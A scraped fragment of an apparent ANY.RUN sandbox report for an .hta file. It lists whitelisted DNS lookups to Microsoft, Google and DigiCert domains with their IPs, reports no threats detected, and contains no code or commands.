AS-COLOCROSSING
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.14
  • 40.126.32.133
  • 20.190.160.128
  • 40.126.32.136
  • 20.190.160.64
  • 20.190.160.67
  • 40.126.32.72
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
botharefgoodformajorworktogivebestthignstodobetter.hta